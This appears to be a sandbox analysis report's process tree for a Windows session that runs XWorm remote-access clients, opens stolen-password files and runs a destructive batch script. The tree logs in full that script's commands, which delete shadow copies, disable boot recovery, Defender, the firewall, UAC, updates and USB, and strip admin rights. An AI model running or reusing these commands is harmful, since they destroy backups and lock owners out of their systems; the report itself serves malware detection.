C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5272 -childID 3 -isForBrowser -prefsHandle 5252 -prefMapHandle 5228 -prefsLen 27092 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d4b48c0-5609-4486-aecb-8a59cc42d48a} 7136 "\\.\pipe\gecko-crash-server-pipe.7136" tab3⤵PID:4892
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5380 -childID 4 -isForBrowser -prefsHandle 5388 -prefMapHandle 5392 -prefsLen 27092 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2b799bb-6647-47fc-b6b7-9fecc5ce72c2} 7136 "\\.\pipe\gecko-crash-server-pipe.7136" tab3⤵PID:6076
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5596 -childID 5 -isForBrowser -prefsHandle 5672 -prefMapHandle 5668 -prefsLen 27092 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {34c19a29-2081-41cd-ad19-563b9353ecb9} 7136 "\\.\pipe\gecko-crash-server-pipe.7136" tab3⤵PID:5024
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Desktop\XWorm V5.1\ClientsFolder\9A78ACA14CB1BEF2667A\Recovery\RecoveryData\passwords.json"1⤵PID:6352
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Desktop\XWorm V5.1\ClientsFolder\9A78ACA14CB1BEF2667A\Recovery\RecoveryData\passwords.json"2⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:7068 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2012 -parentBuildID 20240401114208 -prefsHandle 1940 -prefMapHandle 1932 -prefsLen 27202 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc0535a5-0be4-403d-b6fa-f6a3991b987c} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" gpu3⤵PID:6020
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2388 -prefMapHandle 2376 -prefsLen 28122 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {153f35f9-b616-4c94-b068-108bb3a6348c} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" socket3⤵
- Checks processor information in registry
PID:5924
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3376 -childID 1 -isForBrowser -prefsHandle 3392 -prefMapHandle 3388 -prefsLen 28263 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1a0ba54-9fd5-4c21-ad6a-0624f2be4cba} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" tab3⤵PID:6976
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2892 -childID 2 -isForBrowser -prefsHandle 3700 -prefMapHandle 3432 -prefsLen 32612 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0dcd3cb-f6e3-407f-a5a4-660b31839e6e} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" tab3⤵PID:648
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4444 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4368 -prefMapHandle 4424 -prefsLen 32612 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ad2aa5e8-d097-40fc-a31d-76b55010f209} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" utility3⤵
- Checks processor information in registry
PID:7136
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5164 -childID 3 -isForBrowser -prefsHandle 5184 -prefMapHandle 5112 -prefsLen 27092 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2a8d97b-3d6f-4bfc-9121-c19dd8388472} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" tab3⤵PID:6692
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5328 -childID 4 -isForBrowser -prefsHandle 5404 -prefMapHandle 5400 -prefsLen 27092 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91fb5600-1f33-429b-a4f6-959beae9ae2b} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" tab3⤵PID:6308
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5556 -childID 5 -isForBrowser -prefsHandle 5300 -prefMapHandle 5304 -prefsLen 27092 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0bfcbb26-27ec-4371-bd7b-41495858945a} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" tab3⤵PID:6744
-
-
-
C:\Windows\System32\CredentialUIBroker.exe"C:\Windows\System32\CredentialUIBroker.exe" NonAppContainerFailedMip -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:2084
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4428,i,8761251365550662630,14794322401737333251,262144 --variations-seed-version --mojo-platform-channel-handle=4444 /prefetch:141⤵PID:5728
-
C:\Users\Admin\Desktop\XClient4.exe"C:\Users\Admin\Desktop\XClient4.exe"1⤵
- Executes dropped EXE
PID:556
-
C:\Users\Admin\Desktop\XClient4.exe"C:\Users\Admin\Desktop\XClient4.exe"1⤵
- Executes dropped EXE
PID:5864
-
C:\Users\Admin\Desktop\XClient3.exe"C:\Users\Admin\Desktop\XClient3.exe"1⤵
- Executes dropped EXE
PID:5284
-
C:\Users\Admin\Desktop\XClient4.exe"C:\Users\Admin\Desktop\XClient4.exe"1⤵
- Executes dropped EXE
PID:6996
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4112,i,8761251365550662630,14794322401737333251,262144 --variations-seed-version --mojo-platform-channel-handle=4084 /prefetch:141⤵PID:6732
-
C:\Users\Admin\Desktop\portmap.exe"C:\Users\Admin\Desktop\portmap.exe"1⤵
- Executes dropped EXE
PID:7092
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵PID:4312
-
C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe"C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications1⤵PID:6756
-
C:\Users\Admin\Desktop\XClient3.exe"C:\Users\Admin\Desktop\XClient3.exe"1⤵
- Executes dropped EXE
PID:6220
-
C:\Program Files\playit_gg\bin\playit.exe"C:\Program Files\playit_gg\bin\playit.exe"1⤵
- Executes dropped EXE
PID:5840
-
C:\Users\Admin\Desktop\XClient3.exe"C:\Users\Admin\Desktop\XClient3.exe"1⤵
- Executes dropped EXE
PID:5272
-
C:\Users\Admin\Desktop\XClient4.exe"C:\Users\Admin\Desktop\XClient4.exe"1⤵
- Executes dropped EXE
PID:6108
-
C:\Users\Admin\Desktop\portmap.exe"C:\Users\Admin\Desktop\portmap.exe"1⤵
- Executes dropped EXE
PID:6284
-
C:\Users\Admin\Desktop\XClient.exe"C:\Users\Admin\Desktop\XClient.exe"1⤵
- Executes dropped EXE
PID:2816
-
C:\Users\Admin\Desktop\XClient2.exe"C:\Users\Admin\Desktop\XClient2.exe"1⤵
- Executes dropped EXE
PID:1384
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1940,i,8761251365550662630,14794322401737333251,262144 --variations-seed-version --mojo-platform-channel-handle=4060 /prefetch:141⤵PID:1344
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004A8 0x00000000000004B81⤵PID:4668
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=3876,i,8761251365550662630,14794322401737333251,262144 --variations-seed-version --mojo-platform-channel-handle=4008 /prefetch:141⤵PID:1432
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2336 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe6023cc40,0x7ffe6023cc4c,0x7ffe6023cc582⤵PID:3524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1836,i,17393921940394298519,18025797334469273134,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=1832 /prefetch:22⤵PID:1528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2084,i,17393921940394298519,18025797334469273134,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=2144 /prefetch:32⤵PID:5836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,17393921940394298519,18025797334469273134,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=2224 /prefetch:82⤵PID:3376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,17393921940394298519,18025797334469273134,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=3252 /prefetch:12⤵PID:2524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,17393921940394298519,18025797334469273134,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=3300 /prefetch:12⤵PID:5504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3584,i,17393921940394298519,18025797334469273134,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=4512 /prefetch:12⤵PID:6280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4728,i,17393921940394298519,18025797334469273134,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=4744 /prefetch:82⤵PID:444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,17393921940394298519,18025797334469273134,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=4840 /prefetch:82⤵PID:6400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4832,i,17393921940394298519,18025797334469273134,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=4996 /prefetch:82⤵PID:5944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4920,i,17393921940394298519,18025797334469273134,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=4848 /prefetch:82⤵PID:6768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5000,i,17393921940394298519,18025797334469273134,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=5228 /prefetch:12⤵PID:6140
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:4960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1672
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\lol.txt.docx" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3616
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\lol.txt1⤵
- Opens file in notepad (likely ransom note)
PID:5200
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\lol.bat" "1⤵PID:2328
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f2⤵PID:7060
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v EnableScripts /t REG_DWORD /d 0 /f2⤵PID:6596
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:444
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:1344
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {globalsettings} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:648
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootmenupolicy Standard2⤵
- Modifies boot configuration data using bcdedit
PID:3244
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {globalsettings} advancedoptions No2⤵
- Modifies boot configuration data using bcdedit
PID:7156
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:6184
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:2824
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {globalsettings} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:7032
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {globalsettings} advancedoptions No2⤵
- Modifies boot configuration data using bcdedit
PID:5692
-
-
C:\Windows\system32\ReAgentc.exereagentc /disable2⤵
- Drops file in Windows directory
PID:5704
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableWinRE /t REG_DWORD /d 1 /f2⤵PID:484
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootmenupolicy Standard2⤵
- Modifies boot configuration data using bcdedit
PID:6924
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootmenupolicy legacy2⤵
- Modifies boot configuration data using bcdedit
PID:3328
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {globalsettings} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2928
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootmenupolicy legacy2⤵
- Modifies boot configuration data using bcdedit
PID:5216
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:5684
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵PID:1916
-
-
C:\Windows\system32\sc.exesc config vss start= disabled2⤵
- Launches sc.exe
PID:588
-
-
C:\Windows\system32\sc.exesc stop vss2⤵
- Launches sc.exe
PID:3876
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:6548
-
-
C:\Windows\system32\diskpart.exediskpart /s "C:\Users\Admin\Desktop\delete_recovery.txt"2⤵PID:3276
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableWinRE /t REG_DWORD /d 1 /f2⤵PID:3856
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 4 /f2⤵
- Modifies security service
PID:3012
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f2⤵PID:6288
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled2⤵
- Launches sc.exe
PID:6308
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵PID:6744
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskScheduler /t REG_DWORD /d 1 /f2⤵PID:6336
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:6004
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootmenupolicy Standard2⤵
- Modifies boot configuration data using bcdedit
PID:6568
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f2⤵PID:2284
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f2⤵PID:1464
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵PID:1504
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSettingsPageVisibility /t REG_SZ /d "hide:" /f2⤵PID:6328
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f2⤵PID:6084
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:4336
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisallowRun /t REG_DWORD /d 1 /f2⤵
- Blocks application from running via registry modification
PID:2488
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\Installer" /v DisableMSI /t REG_DWORD /d 1 /f2⤵PID:7128
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\WindowsStore" /v RemoveWindowsStore /t REG_DWORD /d 1 /f2⤵PID:6552
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f2⤵PID:5712
-
-
C:\Windows\system32\net.exenet localgroup Administrators "Standard User" /delete2⤵
- Indicator Removal: Network Share Connection Removal
PID:5796 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "Standard User" /delete3⤵
- Indicator Removal: Network Share Connection Removal
PID:7036
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f2⤵PID:2948
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f2⤵PID:5060
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableGPEdit /t REG_DWORD /d 1 /f2⤵PID:1992
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled2⤵
- Launches sc.exe
PID:5192
-
-
C:\Windows\system32\net.exenet stop wuauserv2⤵PID:940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wuauserv3⤵PID:6200
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵PID:1484
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:6396
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f2⤵PID:5028
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {globalsettings} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:6980
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisablePasswordReset /t REG_DWORD /d 1 /f2⤵PID:6292
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f2⤵PID:7120
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f2⤵PID:3128
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSFCDisable /t REG_DWORD /d 1 /f2⤵PID:5112
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f2⤵PID:1816
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 0 /f2⤵PID:6636
-
-
C:\Windows\system32\ReAgentc.exereagentc /disable2⤵
- Drops file in Windows directory
PID:5984
-
-
C:\Windows\system32\sc.exesc config vss start= disabled2⤵
- Launches sc.exe
PID:4252
-
-
C:\Windows\system32\sc.exesc config srservice start= disabled2⤵
- Launches sc.exe
PID:7132
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2588
-
-
C:\Windows\system32\sc.exesc config Schedule start= disabled2⤵
- Launches sc.exe
PID:4580
-
-
C:\Windows\system32\net.exenet stop Schedule2⤵PID:5884
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Schedule3⤵PID:4236
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootmenupolicy legacy2⤵
- Modifies boot configuration data using bcdedit
PID:4552
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:2108
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled2⤵
- Launches sc.exe
PID:6264
-
-
C:\Windows\system32\net.exenet stop wuauserv2⤵PID:3984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wuauserv3⤵PID:6312
-
-
-
C:\Windows\system32\sc.exesc config trustedinstaller start= disabled2⤵
- Launches sc.exe
PID:3952
-
-
C:\Windows\system32\net.exenet stop trustedinstaller2⤵PID:5372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop trustedinstaller3⤵PID:6532
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows Defender\Policy Manager" /v DisableAntiTamper /t REG_DWORD /d 1 /f2⤵PID:6180
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
PID:1548
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\UsbHub" /v Start /t REG_DWORD /d 4 /f2⤵PID:3376
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f2⤵PID:2584
-
-
C:\Windows\system32\sc.exesc config winmgmt start= disabled2⤵
- Launches sc.exe
PID:7028
-
-
C:\Windows\system32\net.exenet stop winmgmt2⤵PID:6276
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop winmgmt3⤵PID:4716
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate" /v DisableRollback /t REG_DWORD /d 1 /f2⤵PID:4892
-
-
C:\Windows\system32\sc.exesc config netprofm start= disabled2⤵
- Launches sc.exe
PID:3380
-
-
C:\Windows\system32\net.exenet stop netprofm2⤵PID:6840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop netprofm3⤵PID:3828
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f2⤵PID:2848
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoEventViewer /t REG_DWORD /d 1 /f2⤵PID:6224
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangeTime /t REG_DWORD /d 1 /f2⤵PID:4720
-
-
